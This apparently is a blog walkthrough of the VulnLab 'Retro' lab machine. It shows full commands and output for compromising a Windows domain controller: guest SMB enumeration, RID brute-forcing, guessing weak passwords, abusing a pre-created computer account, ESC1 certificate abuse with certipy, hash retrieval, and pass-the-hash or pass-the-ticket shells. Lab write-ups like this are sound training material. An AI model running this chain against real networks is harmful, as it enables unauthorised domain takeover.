Post

VulnLab Retro

VulnLab Retro

VulnLab Retro

Retro

Recon

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
└─$ rustscan -a 10.10.83.151 -r 1-65535                                                            
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
😵 https://admin.tryhackme.com

[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size '-b 65435'.
Open 10.10.83.151:53
Open 10.10.83.151:88
Open 10.10.83.151:135
Open 10.10.83.151:139
Open 10.10.83.151:389
Open 10.10.83.151:445
Open 10.10.83.151:464
Open 10.10.83.151:593
Open 10.10.83.151:636
Open 10.10.83.151:3268
Open 10.10.83.151:3269
Open 10.10.83.151:3389
Open 10.10.83.151:9389
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-11 19:59 +05
Initiating Ping Scan at 19:59
Scanning 10.10.83.151 [4 ports]
Completed Ping Scan at 19:59, 0.13s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 19:59
Completed Parallel DNS resolution of 1 host. at 19:59, 0.07s elapsed
DNS resolution of 1 IPs took 0.07s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 19:59
Scanning 10.10.83.151 [13 ports]
Discovered open port 3389/tcp on 10.10.83.151
Discovered open port 445/tcp on 10.10.83.151
Discovered open port 135/tcp on 10.10.83.151
Discovered open port 53/tcp on 10.10.83.151
Discovered open port 139/tcp on 10.10.83.151
Discovered open port 3268/tcp on 10.10.83.151
Discovered open port 464/tcp on 10.10.83.151
Discovered open port 9389/tcp on 10.10.83.151
Discovered open port 88/tcp on 10.10.83.151
Discovered open port 636/tcp on 10.10.83.151
Discovered open port 389/tcp on 10.10.83.151
Discovered open port 593/tcp on 10.10.83.151
Discovered open port 3269/tcp on 10.10.83.151
Completed SYN Stealth Scan at 19:59, 0.20s elapsed (13 total ports)
Nmap scan report for 10.10.83.151
Host is up, received echo-reply ttl 127 (0.092s latency).
Scanned at 2024-12-11 19:59:55 +05 for 0s

PORT     STATE SERVICE          REASON
53/tcp   open  domain           syn-ack ttl 127
88/tcp   open  kerberos-sec     syn-ack ttl 127
135/tcp  open  msrpc            syn-ack ttl 127
139/tcp  open  netbios-ssn      syn-ack ttl 127
389/tcp  open  ldap             syn-ack ttl 127
445/tcp  open  microsoft-ds     syn-ack ttl 127
464/tcp  open  kpasswd5         syn-ack ttl 127
593/tcp  open  http-rpc-epmap   syn-ack ttl 127
636/tcp  open  ldapssl          syn-ack ttl 127
3268/tcp open  globalcatLDAP    syn-ack ttl 127
3269/tcp open  globalcatLDAPssl syn-ack ttl 127
3389/tcp open  ms-wbt-server    syn-ack ttl 127
9389/tcp open  adws             syn-ack ttl 127

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.51 seconds
           Raw packets sent: 17 (724B) | Rcvd: 14 (600B)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
└─$ nmap -sC -sV -p53,88,139,135,389,445,464,593,636,3268,3269,9389 10.10.83.151 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-11 20:01 +05
Nmap scan report for 10.10.83.151
Host is up (0.089s latency).

PORT     STATE SERVICE           VERSION
53/tcp   open  domain            Simple DNS Plus
88/tcp   open  kerberos-sec      Microsoft Windows Kerberos (server time: 2024-12-11 15:00:37Z)
135/tcp  open  msrpc             Microsoft Windows RPC
139/tcp  open  netbios-ssn       Microsoft Windows netbios-ssn
389/tcp  open  ldap              Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.retro.vl
| Not valid before: 2024-12-11T14:46:48
|_Not valid after:  2025-12-11T14:46:48
|_ssl-date: TLS randomness does not represent time
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http        Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap          Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.retro.vl
| Not valid before: 2024-12-11T14:46:48
|_Not valid after:  2025-12-11T14:46:48
3268/tcp open  ldap              Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.retro.vl
| Not valid before: 2024-12-11T14:46:48
|_Not valid after:  2025-12-11T14:46:48
|_ssl-date: TLS randomness does not represent time
3269/tcp open  globalcatLDAPssl?
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.retro.vl
| Not valid before: 2024-12-11T14:46:48
|_Not valid after:  2025-12-11T14:46:48
|_ssl-date: TLS randomness does not represent time
9389/tcp open  mc-nmf            .NET Message Framing
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: -1m16s
| smb2-time: 
|   date: 2024-12-11T15:01:00
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 70.13 seconds

Enumerating LDAP shows nothing

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
└─$ ldapsearch -x -H ldap://10.10.83.151 -s base namingContexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingContexts 
#

#
dn:
namingContexts: DC=retro,DC=vl
namingContexts: CN=Configuration,DC=retro,DC=vl
namingContexts: CN=Schema,CN=Configuration,DC=retro,DC=vl
namingContexts: DC=DomainDnsZones,DC=retro,DC=vl
namingContexts: DC=ForestDnsZones,DC=retro,DC=vl

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
└─$ ldapsearch -x -H ldap://10.10.83.151 -b 'DC=retro,DC=vl'   
# extended LDIF
#
# LDAPv3
# base <DC=retro,DC=vl> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#

# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090AC9, comment: In order to perform this opera
 tion a successful bind must be completed on the connection., data 0, v4f7c

# numResponses: 1

Let’s move to smb. Nothing with Null Authentication, but Guest account seems to be enabled and we can see the shares.

1
2
3
4
└─$ nxc smb 10.10.83.151 -u '' -p '' --shares
SMB         10.10.83.151    445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB         10.10.83.151    445    DC               [+] retro.vl\: 
SMB         10.10.83.151    445    DC               [-] Error enumerating shares: STATUS_ACCESS_DENIED
1
2
3
4
5
6
7
8
9
10
11
12
13
└─$ nxc smb 10.10.83.151 -u 'guest' -p '' --shares
SMB         10.10.83.151    445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB         10.10.83.151    445    DC               [+] retro.vl\guest: 
SMB         10.10.83.151    445    DC               [*] Enumerated shares
SMB         10.10.83.151    445    DC               Share           Permissions     Remark
SMB         10.10.83.151    445    DC               -----           -----------     ------
SMB         10.10.83.151    445    DC               ADMIN$                          Remote Admin
SMB         10.10.83.151    445    DC               C$                              Default share
SMB         10.10.83.151    445    DC               IPC$            READ            Remote IPC
SMB         10.10.83.151    445    DC               NETLOGON                        Logon server share 
SMB         10.10.83.151    445    DC               Notes                           
SMB         10.10.83.151    445    DC               SYSVOL                          Logon server share 
SMB         10.10.83.151    445    DC               Trainees        READ    

Root

Let’s check Trainees share

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
└─$ impacket-smbclient guest@10.10.83.151 -no-pass
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

Type help for list of commands
# use Trainees
# ls
drw-rw-rw-          0  Mon Jul 24 04:16:11 2023 .
drw-rw-rw-          0  Wed Jul 26 15:54:14 2023 ..
-rw-rw-rw-        288  Mon Jul 24 04:16:11 2023 Important.txt
# cat important.txt
Dear Trainees,

I know that some of you seemed to struggle with remembering strong and unique passwords.
So we decided to bundle every one of you up into one account.
Stop bothering us. Please. We have other stuff to do than resetting your password every day.

Regards

The Admins
# 

Information from the note is useful, let’s continue enumeration and do rid bruteforcing

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
└─$ nxc smb 10.10.83.151 -u 'guest' -p '' --rid-brute
SMB         10.10.83.151    445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB         10.10.83.151    445    DC               [+] retro.vl\guest: 
SMB         10.10.83.151    445    DC               498: RETRO\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.83.151    445    DC               500: RETRO\Administrator (SidTypeUser)
SMB         10.10.83.151    445    DC               501: RETRO\Guest (SidTypeUser)
SMB         10.10.83.151    445    DC               502: RETRO\krbtgt (SidTypeUser)
SMB         10.10.83.151    445    DC               512: RETRO\Domain Admins (SidTypeGroup)
SMB         10.10.83.151    445    DC               513: RETRO\Domain Users (SidTypeGroup)
SMB         10.10.83.151    445    DC               514: RETRO\Domain Guests (SidTypeGroup)
SMB         10.10.83.151    445    DC               515: RETRO\Domain Computers (SidTypeGroup)
SMB         10.10.83.151    445    DC               516: RETRO\Domain Controllers (SidTypeGroup)
SMB         10.10.83.151    445    DC               517: RETRO\Cert Publishers (SidTypeAlias)
SMB         10.10.83.151    445    DC               518: RETRO\Schema Admins (SidTypeGroup)
SMB         10.10.83.151    445    DC               519: RETRO\Enterprise Admins (SidTypeGroup)
SMB         10.10.83.151    445    DC               520: RETRO\Group Policy Creator Owners (SidTypeGroup)
SMB         10.10.83.151    445    DC               521: RETRO\Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.83.151    445    DC               522: RETRO\Cloneable Domain Controllers (SidTypeGroup)
SMB         10.10.83.151    445    DC               525: RETRO\Protected Users (SidTypeGroup)
SMB         10.10.83.151    445    DC               526: RETRO\Key Admins (SidTypeGroup)
SMB         10.10.83.151    445    DC               527: RETRO\Enterprise Key Admins (SidTypeGroup)
SMB         10.10.83.151    445    DC               553: RETRO\RAS and IAS Servers (SidTypeAlias)
SMB         10.10.83.151    445    DC               571: RETRO\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         10.10.83.151    445    DC               572: RETRO\Denied RODC Password Replication Group (SidTypeAlias)
SMB         10.10.83.151    445    DC               1000: RETRO\DC$ (SidTypeUser)
SMB         10.10.83.151    445    DC               1101: RETRO\DnsAdmins (SidTypeAlias)
SMB         10.10.83.151    445    DC               1102: RETRO\DnsUpdateProxy (SidTypeGroup)
SMB         10.10.83.151    445    DC               1104: RETRO\trainee (SidTypeUser)
SMB         10.10.83.151    445    DC               1106: RETRO\BANKING$ (SidTypeUser)
SMB         10.10.83.151    445    DC               1107: RETRO\jburley (SidTypeUser)
SMB         10.10.83.151    445    DC               1108: RETRO\HelpDesk (SidTypeGroup)
SMB         10.10.83.151    445    DC               1109: RETRO\tblack (SidTypeUser)

We see trainee account that was mentioned in the note. Since password is not strong/unique, we can try the first guess for a password which is trainee

1
2
3
└─$ nxc smb 10.10.83.151 -u 'trainee' -p 'trainee' 
SMB         10.10.83.151    445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB         10.10.83.151    445    DC               [+] retro.vl\trainee:trainee 

Since now we have creds, we can try enumerating shares again and see what we can access

1
2
3
4
5
6
7
8
9
10
11
12
13
└─$ nxc smb 10.10.83.151 -u 'trainee' -p 'trainee' --shares
SMB         10.10.83.151    445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB         10.10.83.151    445    DC               [+] retro.vl\trainee:trainee 
SMB         10.10.83.151    445    DC               [*] Enumerated shares
SMB         10.10.83.151    445    DC               Share           Permissions     Remark
SMB         10.10.83.151    445    DC               -----           -----------     ------
SMB         10.10.83.151    445    DC               ADMIN$                          Remote Admin
SMB         10.10.83.151    445    DC               C$                              Default share
SMB         10.10.83.151    445    DC               IPC$            READ            Remote IPC
SMB         10.10.83.151    445    DC               NETLOGON        READ            Logon server share 
SMB         10.10.83.151    445    DC               Notes           READ            
SMB         10.10.83.151    445    DC               SYSVOL          READ            Logon server share 
SMB         10.10.83.151    445    DC               Trainees        READ   

We have read access to Notes, let’s check it

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
└─$ impacket-smbclient trainee:trainee@10.10.83.151
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

Type help for list of commands
# use Notes
# ls
drw-rw-rw-          0  Mon Jul 24 04:03:16 2023 .
drw-rw-rw-          0  Wed Jul 26 15:54:14 2023 ..
-rw-rw-rw-        248  Mon Jul 24 04:05:56 2023 ToDo.txt
# cat ToDo.txt
Thomas,

after convincing the finance department to get rid of their ancienct banking software
it is finally time to clean up the mess they made. We should start with the pre created
computer account. That one is older than me.

Best

James
# 

Note mentions pre created computer accounts. Read this blog. Important fact is that when you pre-create computer accounts with the Assign this computer account as a pre-Windows 2000 computer checkmark, the password for the computer account becomes the same as the computer account in lowercase. Blog states that to see STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT response in case the password is correct. We have 2 computer accounts, let’s start with Banking$

1
2
3
4
5
6
7
8
9
10
┌──(kali㉿kali)-[~]
└─$ nxc smb 10.10.83.151 -u 'Banking$' -p 'banking' 
SMB         10.10.83.151    445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB         10.10.83.151    445    DC               [-] retro.vl\Banking$:banking STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT 
                                                                                                                                                                                                                                            
┌──(kali㉿kali)-[~]
└─$ nxc smb 10.10.83.151 -u 'Banking$' -p 'INVALID_PASSWORD' 
SMB         10.10.83.151    445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB         10.10.83.151    445    DC               [-] retro.vl\Banking$:INVALID_PASSWORD STATUS_LOGON_FAILURE 

We can see that Banking$ is pre created computer account. Now we have change password for us to be able to use it. We can use smbpasswd, ldappasswd, kpasswd, rpcclient. We used impacket’s variant with -p rpc-samr

1
2
3
4
5
6
7
└─$ impacket-changepasswd 'retro.vl/BANKING$':banking@10.10.83.151 -newpass 'P@ssw0rd!' -dc-ip 10.10.83.151 -p rpc-samr
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Changing the password of retro.vl\BANKING$
[*] Connecting to DCE/RPC as retro.vl\BANKING$
[*] Password was changed successfully.

We can now check if ADCS is installed. Note that if bloodhound would find it right away, but we didn’t run it.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
└─$ certipy find -u 'BANKING$'@retro.vl -p P@ssw0rd! -dc-ip 10.10.83.151 -stdout
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'retro-DC-CA' via CSRA
[!] Got error while trying to get CA configuration for 'retro-DC-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'retro-DC-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Got CA configuration for 'retro-DC-CA'
[*] Enumeration output:
<SNIP>

We have ADCS, let’s find vulnerable certificate templates

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
└─$ certipy find -u 'BANKING$'@retro.vl -p P@ssw0rd! -dc-ip 10.10.83.151 -stdout -vulnerable
Certipy v4.8.2 - by Oliver Lyak (ly4k)
<SNIP>
Certificate Templates
  0
    Template Name                       : RetroClients
    Display Name                        : Retro Clients
    Certificate Authorities             : retro-DC-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Enrollment Flag                     : None
    Private Key Flag                    : 16842752
    Extended Key Usage                  : Client Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Validity Period                     : 1 year
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 4096
    Permissions
      Enrollment Permissions
        Enrollment Rights               : RETRO.VL\Domain Admins
                                          RETRO.VL\Domain Computers
                                          RETRO.VL\Enterprise Admins
      Object Control Permissions
        Owner                           : RETRO.VL\Administrator
        Write Owner Principals          : RETRO.VL\Domain Admins
                                          RETRO.VL\Enterprise Admins
                                          RETRO.VL\Administrator
        Write Dacl Principals           : RETRO.VL\Domain Admins
                                          RETRO.VL\Enterprise Admins
                                          RETRO.VL\Administrator
        Write Property Principals       : RETRO.VL\Domain Admins
                                          RETRO.VL\Enterprise Admins
                                          RETRO.VL\Administrator
    [!] Vulnerabilities
      ESC1                              : 'RETRO.VL\\Domain Computers' can enroll, enrollee supplies subject and template allows client authentication

We find RetroClients template which is vulnerable to ESC1 and can be requested by Domain Computers. Let’s exploit it.

1
2
3
4
5
6
7
8
9
└─$ certipy req -u 'BANKING$'@retro.vl -p 'P@ssw0rd!' -dc-ip 10.10.83.151 -ca retro-DC-CA -template RetroClients -upn administrator@retro.vl 
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[-] Got error while trying to request certificate: code: 0x80094811 - CERTSRV_E_KEY_LENGTH - The public key does not meet the minimum size required by the specified certificate template.
[*] Request ID is 8
Would you like to save the private key? (y/N) n
[-] Failed to request certificate

We can’t request the certificate due to CERTSRV_E_KEY_LENGTH error, which means that the public key does not meet the minimum size requirements specified by the template. Checking template info from certipy shows that the minimum size is 4096. Now let’s request again with -key-size 4096 option

1
2
3
4
5
6
7
8
9
└─$ certipy req -u 'BANKING$'@retro.vl -p 'P@ssw0rd!' -dc-ip 10.10.83.151 -ca retro-DC-CA -template RetroClients -upn administrator@retro.vl -key-size 4096
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 11
[*] Got certificate with UPN 'administrator@retro.vl'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'

Let’s authenticate using pfx and retrieve administrator’s hash

1
2
3
4
5
6
7
8
9
10
└─$ certipy auth -pfx administrator.pfx -dc-ip 10.10.83.151
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@retro.vl
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@retro.vl': aad3b435b51404eeaad3b435b51404ee:<REDACTED>

We can authenticate using hash or using ticket. To authenicate using ticket, we need to add dc.retro.vl and retro.vl records in /etc/hosts

1
2
3
4
5
6
7
8
└─$ KRB5CCNAME=administrator.ccache impacket-wmiexec -k -no-pass -dc-ip 10.10.83.151 retro.vl/administrator@dc.retro.vl
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>

1
2
3
4
5
6
7
8
└─$ impacket-wmiexec -hashes :<REDACTED> retro.vl/administrator@10.10.83.151
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>

https://api.vulnlab.com/api/v1/share?id=357e9428-1778-410a-be3d-663553d1eb13

This post is licensed under CC BY 4.0 by the author.